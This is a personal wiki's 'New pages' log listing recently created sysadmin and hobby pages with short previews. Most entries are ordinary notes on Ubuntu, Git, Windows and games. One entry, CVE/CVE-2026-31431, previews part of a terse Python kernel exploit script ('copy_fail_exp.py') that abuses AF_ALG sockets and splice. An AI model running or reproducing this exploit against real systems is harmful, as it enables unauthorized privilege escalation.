New pages
Jump to navigation
Jump to search
- 17:06, 5 May 2026 CVE/copy-fail-CVE-2026-31431 (hist | edit) [26 bytes] Kenneth (talk | contribs) (Created page with "See CVE/CVE-2026-31431")
- 17:05, 5 May 2026 CVE/CVE-2026-31431 (hist | edit) [901 bytes] Kenneth (talk | contribs) (Created page with "== Copy Fail == === copy_fail_exp.py === <pre> #!/usr/bin/env python3 import os as g,zlib,socket as s def d(x):return bytes.fromhex(x) def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u....")
- 20:10, 4 May 2026 Ubuntu/IPv6 (hist | edit) [293 bytes] Kenneth (talk | contribs) (Created page with "== Disable IPv6 == <pre> cat >> /etc/sysctl.conf << "EOF" net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1 EOF sudo sysctl -p </pre> Premenent: <pre> /etc/default/grub GRUB_CMDLINE_LINUX="ipv6.disable=1" sudo update-grub </pre>")
- 20:54, 1 May 2026 8020 (hist | edit) [1,734 bytes] Kenneth (talk | contribs) (Created page with "== 80/20 Aluminum == 80/20 aluminum is a modular, lightweight T-slot aluminum extrusion framing system, often called "The Industrial Erector Set®," used to build custom frames, machine guards, workstations, and robotics without welding. It is known for its versatility, durability, and easy assembly using T-slot connectors. Synonyms include T-slot aluminum extrusion, aluminum framing, t-slot aluminum structural framing, or aluminum profiles. Key Features and Usage Exam...")
- 20:06, 1 May 2026 PPA (hist | edit) [96 bytes] Kenneth (talk | contribs) (Created page with "== Ubuntu's Personal Package Archive - PPA == Similar to RHEL's EPEL")
- 16:14, 21 April 2026 Linux/patch (hist | edit) [1,679 bytes] Kenneth (talk | contribs) (Created page with "See: * Linux/diff * patch * diff")
- 22:04, 20 April 2026 Ubuntu/Sources/22 (hist | edit) [3,294 bytes] Kenneth (talk | contribs) (Created page with "== 22 - Jammy == <pre> $ cat /etc/os-release PRETTY_NAME="Ubuntu 22.04.5 LTS" NAME="Ubuntu" VERSION_ID="22.04" VERSION="22.04.5 LTS (Jammy Jellyfish)" VERSION_CODENAME=jammy ID=ubuntu ID_LIKE=debian HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" </pre> <pre> $ cat /etc/apt/sources.list # deb cdrom:[Ubuntu 22....")
- 22:02, 20 April 2026 Ubuntu/Sources/Jammy (hist | edit) [25 bytes] Kenneth (talk | contribs) (Created page with "See Ubuntu/Sources/22")
- 22:02, 20 April 2026 Ubuntu/Sources (hist | edit) [258 bytes] Kenneth (talk | contribs) (Created page with "== Sources == == 24 - Xenial == See Ubuntu/Sources/24 See Ubuntu/Sources/Xenial == 22 - Jammy == See Ubuntu/Sources/22 See Ubuntu/Sources/Jammy == 20 - Xenial == See Ubuntu/Sources/20 See Ubuntu/Sources/Xenial == keywords ==")
- 20:55, 14 April 2026 GitHub/GitHub Actions Workflow (hist | edit) [23 bytes] Kenneth (talk | contribs) (Created page with "See GitHub/Workflow")
- 06:58, 10 April 2026 VBinDiff (hist | edit) [450 bytes] Kenneth (talk | contribs) (Created page with "GitHub: https://github.com/madsen/vbindiff Build Source Code: # Ubuntu Dependencies: sudo apt install libtemplate-perl # Clone git clone https://github.com/madsen/vbindiff.git cd vbindiff git submodule update --init autoreconf -i ./configure make clean make ./vbindiff [binfile1] [binfile2] Press [enter] to jump to next difference between two bin files. Will be highlighted in red (beta 6 version) (or light cyan in beta 5 version)")
- 06:18, 8 April 2026 Games/StarRupture (hist | edit) [390 bytes] Kenneth (talk | contribs) (Created page with "== Save Game Location == C:\Program Files (x86)\Steam\userdata\[YourSteamID]\1631270\remote\Saved\SaveGames")
- 22:56, 31 March 2026 Mermaid Charts (hist | edit) [1,116 bytes] Kenneth (talk | contribs) (Created page with "== Mermaid Charts == The "official" Mermaid Editor plugin by the team behind the Mermaid open source project. https://www.mermaidchart.com/ https://mermaid.ai/ Mermaid Chart was born out of the Mermaid open source project and was founded by Knut Sveidqvist together with Open Core Ventures. The lead developers from Mermaid have joined the company and there is a strong connection between the project we all love and Mermaid Chart. Mermaid Chart brings resources to the...")
- 23:01, 27 March 2026 IDF (hist | edit) [11 bytes] Kenneth (talk | contribs) (Created page with "IDF and MDF")
- 17:19, 25 March 2026 Ghostery (hist | edit) [310 bytes] Kenneth (talk | contribs) (Created page with "== Ghostery == https://www.ghostery.com/ Chrome: https://chromewebstore.google.com/detail/ghostery-tracker-ad-block/mlomiejdfkolichcflejclcbmpeaniij Firefox: https://addons.mozilla.org/en-US/firefox/addon/ghostery/ == Ad Blocker == See also Ad Blocker == keywords == keyword: mispelling Ghosterly")
- 17:17, 25 March 2026 Firefox/Extensions (hist | edit) [2,604 bytes] Kenneth (talk | contribs) (Created page with "== Extensions ==")
- 17:01, 23 March 2026 VM (hist | edit) [57 bytes] Kenneth (talk | contribs) (Created page with "VM == VM Detection ==")
- 22:41, 22 March 2026 Git/Shallow (hist | edit) [9,406 bytes] Kenneth (talk | contribs) (Created page with "== Shallow Clone == git clone --filter=blob:none <url> creates a blobless clone. ... git clone --filter=tree:0 <url> creates a treeless clone. ... git clone --depth=1 <url> creates a shallow clone. == Convert Cloned Repo to Shallow == <pre> git clone --depth-1 <repo> -b <branch> git clone --depth 1 org-1234@github.com:MYORG/MYREPO.git -b MYREPO/MYBRANCH MYBRANCH git clean -x -f -d . git pull --depth 1 git fetch --depth 1 git reflog expire --expire=0 git reflog...")
- 21:15, 22 March 2026 Linux/tree (hist | edit) [231 bytes] Kenneth (talk | contribs) (Created page with "== Always Show Color == With less: <ref>https://superuser.com/questions/117841/when-reading-a-file-with-less-or-more-how-can-i-get-the-content-in-colors</ref> tree -a -C | less -R")
- 21:15, 22 March 2026 Linux/less (hist | edit) [357 bytes] Kenneth (talk | contribs) (Created page with "== Always Show Color == less -R With ls: <ref>https://superuser.com/questions/117841/when-reading-a-file-with-less-or-more-how-can-i-get-the-content-in-colors</ref> ls --color=always -l | less -R With tree: <ref>https://superuser.com/questions/117841/when-reading-a-file-with-less-or-more-how-can-i-get-the-content-in-colors</ref> tree -a -C | less -R")
- 19:47, 17 March 2026 Pacman (hist | edit) [13 bytes] Kenneth (talk | contribs) (Created page with "See MSYS2")
- 19:46, 17 March 2026 MSYS2 (hist | edit) [4,656 bytes] Kenneth (talk | contribs) (Created page with " MSYS2 https://www.msys2.org/ Software Distribution and Building Platform for Windows MSYS2 is a collection of tools and libraries providing you with an easy-to-use environment for building, installing and running native Windows software. It consists of a command line terminal called mintty, bash, version control systems like git and subversion, tools like tar and awk and even build systems like autotools, all based on a modified version of Cygwin. Despite some of...")
- 18:30, 11 March 2026 Windows/SSHD (hist | edit) [2,198 bytes] Kenneth (talk | contribs) (Created page with "== Install OpenSSH == Install the Inbox Version: <ref>https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell&pivots=windows-11</ref> # In Admin window: # Verify Admin (New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) # Verify Capabilities Get-WindowsCapability -Online | Where-Object Name -lik...")
- 23:05, 10 March 2026 OneDrive (hist | edit) [26 bytes] Kenneth (talk | contribs) (Created page with "See Microsoft/OneDrive")
- 21:25, 8 March 2026 Npm (hist | edit) [659 bytes] Kenneth (talk | contribs) (Created page with "== npm == == install package globally == sudo npm install -g [package] == install package local == Install package to ~/node_modules npm install [package] To install to another folder: # to install into parallel with the .npm cache folder... npm install --prefix ~/.npm [package] # example: npm install --prefix ~/.npm docker-browse This will create: ~/.npm/node_modules/ ~/.npm/node_modules/docker-browse/ ~/.npm/node_modules/several-other-dependecies/ ~/....")
- 00:56, 3 March 2026 FLEXlm (hist | edit) [14 bytes] Kenneth (talk | contribs) (Created page with "See FlexLM")
- 23:35, 2 March 2026 FlexLM (hist | edit) [761 bytes] Kenneth (talk | contribs) (Created page with "{FlexLM} (now officially FlexNet Publisher) is the industry-standard software license management system developed by Flexera. It controls, monitors, and optimizes application usage across networks, typically utilizing a floating (concurrent) license model where a central server manages a pool of licenses for multiple users. It supports node-locked licenses, manages license files (often found at C:\flexlm\license on Windows), and allows for vendor-specific configurations....")
- 23:35, 2 March 2026 RLM (hist | edit) [2,837 bytes] Kenneth (talk | contribs) (Created page with "Reprise License Manager (RLM) is considered a, or a spiritual successor to, FLEXlm (now FlexNet Publisher). It was founded in 2006 by the original developers of GLOBEtrotter, the company that created FLEXlm * https://www.openlm.com/blog/what-is-reprise-rlm/ * https://www.openlm.com/supported-software/reprise-license-management-rlm-and-optimization-with-openlm/ {FlexLM} (now officially FlexNet Publisher) is the industry-standard software license management system develo...")
- 23:54, 27 February 2026 Windows/SMB (hist | edit) [788 bytes] Kenneth (talk | contribs) (Created page with "== Get Windows Connections == === net use === Show connections: net use Example: <pre> C:\> net use New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK W: \\ci-store.example.com\ci Microsoft Windows Network </pre> === Get-SmbConnection === Show which user connected: Get-SmbConnection Example: <pre> PS C:\> Get-SmbConnection...")
- 23:51, 27 February 2026 Windows/Samba (hist | edit) [19 bytes] Kenneth (talk | contribs) (Created page with "See Windows/SMB")
- 19:07, 18 February 2026 ATX (hist | edit) [55 bytes] Kenneth (talk | contribs) (Created page with "== ATX Power Supply == See PSU for Paper Clip test")
- 19:07, 18 February 2026 PSU (hist | edit) [161 bytes] Kenneth (talk | contribs) (Created page with "== PSU Paper Clip Test == How to Jump Start your power supply (Paper clip test) https://www.silverstonetek.com/upload/downloads/QA/PSU/PSU-Paper%20Clip-EN.pdf")
- 08:38, 17 February 2026 Synergy (hist | edit) [119 bytes] Kenneth (talk | contribs) (Created page with "== Winget Install == winget install -e --id=Symless.Synergy == keywords ==")
- 02:48, 13 February 2026 Rufus (hist | edit) [75 bytes] Kenneth (talk | contribs) (Created page with " https://rufus.ie/en/#download Ignore Windows 11 installation requirements")
- 04:59, 11 February 2026 Games/Techtonica (hist | edit) [75 bytes] Kenneth (talk | contribs) (Created page with "== Save Game Location == %APPDATA%\..\LocalLow\Fire Hose Games\Techtonica")
- 06:15, 10 February 2026 GlobalProtect (hist | edit) [735 bytes] Kenneth (talk | contribs) (Created page with "Restart service: (as administrator) net stop pangps The PanGPS service is stopping..... The PanGPS service could not be stopped. The service is starting or stopping. Please try again later. net start pangps The PanGPS service is starting. The PanGPS service was started successfully. Check Task Manager for: PanGPA.exe Check for TCP Port: netstat -an | find "4767" TCP 127.0.0.1:49212 127.0.0.1:4767 SYN_SENT Run Glo...")
- 22:32, 7 February 2026 USB (hist | edit) [4,957 bytes] Kenneth (talk | contribs) (Created page with "== USB Testing ==")
- 07:33, 6 February 2026 Python/3.14 (hist | edit) [26 bytes] Kenneth (talk | contribs) (Created page with "See Ubuntu/Python/3.14")
- 22:45, 5 February 2026 Ubuntu/Python/3.14 (hist | edit) [1,994 bytes] Kenneth (talk | contribs) (Created page with " sudo add-apt-repository ppa:deadsnakes/ppa sudo apt update sudo apt install python3.14")
- 22:43, 5 February 2026 Ubuntu/Python (hist | edit) [6 bytes] Kenneth (talk | contribs) (Created page with "Python")
- 18:58, 3 February 2026 Ubuntu/Unattended Upgrades (hist | edit) [118 bytes] Kenneth (talk | contribs) (Created page with " sudo apt install unattended-upgrades See: https://documentation.ubuntu.com/server/how-to/software/automatic-updates/")
- 01:24, 3 February 2026 Games/Wildmender (hist | edit) [225 bytes] Kenneth (talk | contribs) (Created page with " Active Saves: %USERPROFILE%\AppData\LocalLow\Muse Games\Wildmender\worlds\ Backup Saves: %USERPROFILE%\AppData\LocalLow\Muse Games\Wildmender\backup\ Linux Save Path: <SteamLibrary-folder>/steamapps/compatdata/1599330/pfx/") originally created as "Wildmender"
- 01:07, 2 February 2026 Ikea (hist | edit) [552 bytes] Kenneth (talk | contribs) (Created page with "== Gaming Shelves == https://www.ikea.com/us/en/p/billy-bookcase-black-oak-effect-40477340/ BILLY bookcase is a beloved icon that never goes out of style. Thanks to its versatility you can use it in many different ways at home – regardless of whether you store books or everyday items in it. Bookcase, black oak effect, 31 1/2x11x79 1/2 " https://www.ikea.com/us/en/images/products/billy-bookcase-black-oak-effect__1097080_pe864708_s5.jpg <!-- backup: https://i.imgur...")
- 22:55, 1 February 2026 CodeScene (hist | edit) [9,574 bytes] Kenneth (talk | contribs) (Created page with "== CodeScene == https://codescene.com/ == CLI Tools == https://codescene.io/docs/cli/index.html")